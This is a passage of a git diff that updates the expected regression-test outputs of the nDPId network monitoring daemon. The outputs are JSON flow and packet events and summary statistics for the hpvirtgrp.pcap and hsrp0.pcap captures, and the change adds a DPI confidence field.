+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","total-events-serialized":57}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 135/135
@@ -63,10 +63,10 @@
 ~~ total active/idle flows...: 9/9
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4626776 bytes
-~~ total memory freed........: 4626776 bytes
-~~ total allocations/frees...: 99721/99721
+~~ total memory allocated....: 4709105 bytes
+~~ total memory freed........: 4709105 bytes
+~~ total allocations/frees...: 101311/101311
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
-~~ json string max len.......: 665 chars
-~~ json string avg len.......: 484 chars
+~~ json string max len.......: 691 chars
+~~ json string avg len.......: 497 chars
diff --git a/test/results/hsrp0.pcap.out b/test/results/hsrp0.pcap.out
new file mode 100644
index 000000000..65174716b
--- /dev/null
+++ b/test/results/hsrp0.pcap.out
@@ -0,0 +1,33 @@
+00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"hsrp0.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1126551970888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"ts_msec":1126551970888,"pkt":"AQBeAAACAAAMB6wKgQAACggARcAAMAAAAAABESXiChyo\/eAAAAIHwQfBABw\/0wAAEAMKWgoAY2lzY28AAAAKHKj+"}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}}
